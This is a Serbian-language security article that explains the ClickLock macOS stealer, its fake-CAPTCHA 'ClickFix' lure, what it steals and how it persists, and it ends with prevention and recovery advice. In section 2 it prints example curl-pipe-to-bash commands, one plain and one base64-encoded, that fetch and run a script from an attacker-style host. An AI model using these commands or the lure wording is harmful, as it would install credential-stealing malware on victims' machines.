Stručnjaci za sajber bezbednost iz kompanije Group-IB otkrili su novu pretnju usmerenu na korisnike Apple Mac računara. Novi malver nazvan ClickLock Stealer koristi taktiku socijalnog inženjeringa (tzv. ClickFix tehniku) kojom navodi same korisnike da nevoljno instaliraju zlonamerni kod na svoj sistem.
U nastavku se nalazi detaljan pregled ove pretnje, sa konkretnim primerom onoga što napadači pokušavaju da ubace u vaš macOS Terminal i objektivnim objašnjenjem kako se zaštititi.
1. Šta je ClickLock i kako nastaje prevara?
Za razliku od klasičnih malvera koji iskorišćavaju nulte (zero-day) ranjivosti u operativnom sistemu ili zahtevaju kompleksne instalacione pakete, ClickLock se oslanja isključivo na prevaru korisnika.
- Kompromitovane stranice: Napadači preuzimaju kontrolu nad ranjivim WordPress sajtovima i na njima postavljaju lažne provere identiteta.
- Lažni Cloudflare interfejs: Kada posetite takav sajt, prikazuje se prozor koji uverljivo imitira Cloudflare Turnstile ili Google CAPTCHA proveru (“Verify You Are Human” ili “Fix Browser Connection Issues”).
- Automatsko kopiranje u Clipboard: Klikom na dugme za verifikaciju na sajtu, skripta u pozadini automatski kopira zlonamernu komandu u privremenu memoriju (Clipboard) vašeg računara.
- Uputstvo za žrtvu: Na ekranu se pojavljuje obaveštenje sa koracima:“Pritisnite
⌘ + Space, ukucajteTerminal, pritisniteEnter, a zatim zalepite komandu (⌘ + V) i pritisniteEnterda dovršite verifikaciju.”
Korisnik u uverenju da obavlja standardnu bezbednosnu proveru zapravo sam pokreće malver u svom sistemu.
2. Primer komande koja se upisuje u Terminal
Ispod je tipičan primer komande kakvu napadači ubacuju u clipboard žrtve (prikazano u edukativne i analitičke svrhe):
Standardna varijanta napada:
Bash
curl -sSL https://cdn-check-verification.com/v2/verify.sh | bash
Obfuskirana (maskirana) Base64 varijanta:
Zaobilazeći jednostavne skenere teksta u pregledaču, napadači često enkriptuju komandu u Base64 format:
Bash
echo "Y3VybCAtc1NMIGh0dHBzOi8vY2RuLWNoZWNrLXZlcmlmaWNhdGlvbi5jb20vY2hlY2sgfCBiYXNo" | base64 -d | bash
Detaljno objašnjenje svake komponente komande:
curl: Sistemski alat u macOS-u koji služi za preuzimanje sadržaja sa interneta putem komandne linije.-s(silent): Potpuno utišava izlaz komande — ne prikazuju se indikatori napretka preuzimanja niti statusi.-S(show error): Prikazuje grešku samo u slučaju da preuzimanje u potpunosti propadne.-L(location): Nalažecurl-u da automatski prati sva HTTP preusmeravanja (redirects) ukoliko ih server postavi.
|(Pipe operater): Preusmerava izlaz prve komande (preuzeti tekstualni sadržaj sa interneta) direktno kao ulaz u narednu komandu.bash(ilish): Komandni shell interpreter macOS-a. Zbog kombinacije sa pipe operaterom (| bash), preuzeta skripta se izvršava direktno u memoriji računara, bez prethodnog čuvanja fajla na disk. Ovo zaobilazi klasične antivirus skenere datoteka.echo "..." | base64 -d: Prvi deo ispisuje enkodirani tekst, abase64 -dga dekodira u originalnu komandu u realnom vremenu pre nego što je prosledibash-u na izvršavanje.
3. Šta se dešava nakon pokretanja komande?
Čim pritisnete Enter, skripta se pokreće u pozadini sa svim pravima vašeg trenutnog korisničkog naloga:
- Vizuelna varka: Pregledač prikazuje animaciju “uspešne Cloudflare verifikacije” kako biste mislili da je sve proteklo u redu.
- Krađa osetljivih podataka (Stealer): Skripta u sekundi pretražuje lokalne baze podataka i skuplja osetljive fajlove.
- Funkcija pritiska (“Locker”): Ukoliko korisnik posumnja i pokuša da zatvori aplikacije ili odbije unos lozinke za sistemski Keychain, malver nasilno ruši otvarane programe i zamrzava rad dok se ne unesu traženi podaci.
- Slanje podataka preko Telegrama: Svi ukradeni podaci se pakuju u
.ziparhivu i šalju napadačima putem Telegram Bot API infrastrukture, čime napadači sakrivaju svoju pravu IP adresu. - Trajni pristup (Persistence): Iako skripta briše svoje privremene fajlove sa diska, u sistemu može ostaviti unose u
~/Library/LaunchAgentskako bi se ponovo pokrenula pri svakom sledećim paljenju računara.
4. Šta je sve na meti ClickLock malvera?
Podaci kompanije Group-IB pokazuju da je malver izuzetno obiman i cilja finansijski vredne podatke:
- 8 Internet pregledača: Google Chrome, Safari, Arc, Brave, Microsoft Edge, Opera, Mozilla Firefox i Vivaldi (iz kojih krade sačuvane lozinke, kolačiće sesije i istoriju).
- 31 Ekstenzija za kriptovalute: MetaMask, Phantom, Trust Wallet, Coinbase Wallet, Ronin, Exodus i mnogi drugi.
- 7 Ekstenzija menadžera lozinki: 1Password, Bitwarden, LastPass, Dashlane, itd.
- 8 Desktop aplikacija: Aplikacije za upravljanje kripto novčanicima i trgovinu.
- macOS Keychain: Sistemska baza u kojoj macOS čuva sačuvane mrežne i aplikativne lozinke.
5. Kako se zaštititi od ClickFix / ClickLock prevara?
Zlatno pravilo sajber bezbednosti:
Nijedan legitiman servis na internetu (Cloudflare, Google, Apple, Microsoft) NIKADA neće tražiti od vas da otvarate Terminal/Command Prompt i lepite komande da biste dokazali da ste čovek ili rešili problem sa mrežom.
Saveti za prevenciju:
- Prekinite interakciju: Ako veb sajt zahteva otvaranje Terminala, odmah zatvorite tu karticu ili ceo pregledač.
- Izbegavajte
curl | bash: Nikada nemojte pokretati skripte sa interneta direktno u ljusku (shell). Ukoliko je skripta neophodna za rad (npr. zvanični alati poput Homebrew-a), uvek prvo preuzmite fajl, otvorite ga u tekstualnom editoru i pregledajte šta kod radi. - Koristite alate za zaštitu clipboard-a: Pojedini bezbednosni softveri ili ekstenzije mogu vas upozoriti kada veb sajt pokušava neovlašćeno da upiše tekst u vaš Clipboard.
Šta uraditi ako ste slučajno pokrenuli komandu?
- Odmah prekinite mrežnu vezu: Isključite Wi-Fi i izvucite mrežni kabl kako biste onemogućili slanje podataka na Telegram servere napadača.
- Promenite lozinke sa drugog uređaja: Koristeći telefon ili drugi računar, promenite sve lozinke za važne naloge (email, banke, kripto berze) i omogućite 2FA (dvofaktorsku autentifikaciju).
- Prebacite kripto sredstva: Ukoliko koristite browser novčanike (MetaMask, Phantom), kreirajte potpuno nove novčanike na bezbednom uređaju i prebacite sva sredstva na njih.
- Proverite autorun lokacije: Pregledajte direktorijum
~/Library/LaunchAgentsna Mac-u i obrišite sve sumnjive.plistdatoteke stvorene u vreme napada.